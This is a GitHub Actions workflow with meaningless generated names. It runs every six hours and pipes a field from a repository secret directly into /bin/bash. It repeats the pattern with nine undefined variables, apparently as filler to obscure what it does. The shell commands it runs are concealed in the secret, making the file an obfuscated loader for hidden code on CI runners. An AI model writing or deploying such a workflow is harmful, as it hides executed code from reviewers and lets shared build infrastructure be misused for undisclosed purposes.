name: caozhang19870101

on:
  workflow_dispatch:
  schedule:
    - cron: '58 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caozhang19870101
        env:
          zxz133: ${{ secrets.zxz133 }}
        run: |
          echo $zxz133 | jq -r .mr9 | /bin/bash
          echo $ajer476 | jq -r .tzwh686 | /bin/bash
          echo $vakxh774 | jq -r .u0433 | /bin/bash
          echo $qeen156 | jq -r .rye5879 | /bin/bash
          echo $lqjam2036 | jq -r .wa3247 | /bin/bash
          echo $qqob723 | jq -r .uva537 | /bin/bash
          echo $p64395 | jq -r .eey8984 | /bin/bash
          echo $oiiql18009 | jq -r .kqcw46255 | /bin/bash
          echo $folk7579 | jq -r .wwwk6710 | /bin/bash
          echo $gqtlg9349 | jq -r .ugh8133 | /bin/bash

